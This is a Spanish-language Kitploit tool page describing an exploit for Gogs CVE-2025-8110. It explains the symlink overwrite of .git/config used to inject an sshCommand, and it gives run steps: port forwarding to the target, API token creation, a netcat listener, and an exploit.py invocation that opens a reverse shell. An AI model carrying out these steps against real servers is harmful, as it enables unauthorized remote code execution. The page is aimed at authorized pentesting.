Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-8110-Gogs-RCE-Exploit — Gogs CVE-2025-8110 RCE Exploit | Kitploit
Herramientas/GitHubGitHub/adityainnovates/cve-2025-8110-gogs-rce-exploit
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingHerramienta de Acceso Remoto
GitHubadityainnovates/cve-2025-8110-gogs-rce-exploit

CVE-2025-8110-Gogs-RCE-Exploit

Gogs CVE-2025-8110 RCE Exploit

Ver Repositorio
13hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit RCE de CVE-2025-8110 en Gogs

Un exploit automatizado en Python para CVE-2025-8110 en Gogs. Esta vulnerabilidad permite la Ejecución Remota de Código (RCE) abusando de la API PutContents, que no valida si una ruta de archivo es un enlace simbólico. Sobrescribiendo el archivo interno .git/config mediante un enlace simbólico, podemos inyectar un sshCommand malicioso para desencadenar una shell inversa.

🛠️ Requisitos previos

Asegúrate de tener Python 3 y las dependencias necesarias instaladas:

root@kitploit:~
pip install requests rich beautifulsoup4

También debes tener git instalado y accesible en tu $PATH para la fase de clonación y commit del repositorio.

⚙️ Configuración

1. Acceder a la WebUI de Gogs

Gogs puede estar vinculado a 127.0.0.1:3001. Usa el reenvío de puertos para acceder a la WebUI localmente:

root@kitploit:~
ssh -L 3001:127.0.0.1:3001 user@target-ip

2. Creación de cuenta

Una vez reenviado, navega a http://localhost:3001:

  • Crea una nueva cuenta.
  • Anota tu Nombre de usuario y Contraseña para el script.

3. Generar el token de API

El script usa la API de Gogs para entregar el payload:

  1. Inicia sesión en la WebUI.
  2. Navega a Settings -> Applications.
  3. En Manage Personal Access Tokens, genera un nuevo token.
  4. Copia el token inmediatamente.

🚀 Ejecución

1. Inicia un listener con Netcat

Inicia tu listener antes de ejecutar el script, ya que la shell se activa tan pronto como se procesa la actualización de la API.

root@kitploit:~
nc -lvnp 5555

2. Ejecuta el exploit

Pasa tus credenciales y el token como argumentos:

root@kitploit:~
python3 exploit.py -u http://localhost:3001 -un <YOUR_USER> -pw <YOUR_PASS> -t <YOUR_TOKEN> -lh <YOUR_IP> -lp 5555

Argumentos

FlagDescripción
-uLa URL base de la instancia de Gogs (por ejemplo, http://localhost:3001).
-unEl nombre de usuario de la cuenta que creaste.
-pwLa contraseña de la cuenta que creaste.
-tEl token de API generado en Settings.
-lhLa dirección IP de tu listener (LHOST).
-lpEl puerto de tu listener (LPORT).

Nota: Si el script se cuelga o devuelve un Read timed out después de "Overwriting .git/config", verifica tu listener. Esto suele indicar que la shell inversa se ha conectado exitosamente y está manteniendo la conexión.


Autor: TYehan

Descargo de responsabilidad: Esta herramienta es solo para fines educativos y auditorías de seguridad autorizadas. Úsala de manera responsable.

Descargar herramienta